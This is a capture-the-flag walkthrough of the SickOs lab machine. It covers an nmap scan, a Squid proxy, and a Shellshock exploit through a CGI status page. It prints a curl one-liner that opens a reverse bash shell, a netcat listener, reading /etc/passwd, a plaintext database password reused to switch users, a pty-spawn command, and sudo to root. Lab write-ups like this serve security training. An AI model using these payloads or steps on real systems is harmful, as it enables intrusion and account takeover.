Starting with a nmap scan

root@kali:~# nmap -A

Starting Nmap 7.01 ( ) at 2017-02-09 13:19 GMT
Nmap scan report for
Host is up (0.00036s latency).
Not shown: 997 filtered ports
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 08:00:27:75:D4:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1 0.36 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 34.57 seconds
I can see port 22 SSH and 3128 wich is a Http Proxy

Nothing came from the ssh so i moved on to the proxy

I used curl through the proxy and it spat out

root@kali:~# curl --proxy

After snooping around the site i found a page /cgi-bin/status and it gave out this response.

{ "uptime": " 18:59:06 up 1:09, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

After finding the Status page I instanly thought of useing the shellshock vuln so I looked through my notes and had a quick refresh on it pieced together a onliner and hoped for the best.

curl -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/ 0>&1' " --proxy
Started up Netcat on port 4444 and bam Shell

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 39171
bash: no job control in this shell

I was running as the www-data user and now that ive got linitial access my next goal is to get root.

I strated to dig around and I checked the /etc/passwd file and found the sickos user interesting as its not a default user and obviously its the name of the challenge.

www-data@SickOs:/var/www/wolfcms/wolf$ cat /etc/passwd | grep sickos
cat /etc/passwd | grep sickos

with the user I want to get to in mind I started to roam the server I checked the /var/www and came across a config.php

I opened and found this in side

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

I tried Iogged on to the sickos user and I realised I missed a crucial step
www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
su: must be run from a terminal

So i spawned a shell and can continued with logging in to sickos user.

python -c 'import pty; pty.spawn("/bin/bash")'

Take 2
www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
Password: john@123


After loggin in I found it was running with root level privlidges

As our user is running at root level we can simply log in to root with out a password.

Sudo su

I looked in the root directory and found a txt so I opened the txt file and finished the CTF !!!!

Really enjoyed the CTF bit strange that wolfcms wasnt apart of it, maybe theres another way in.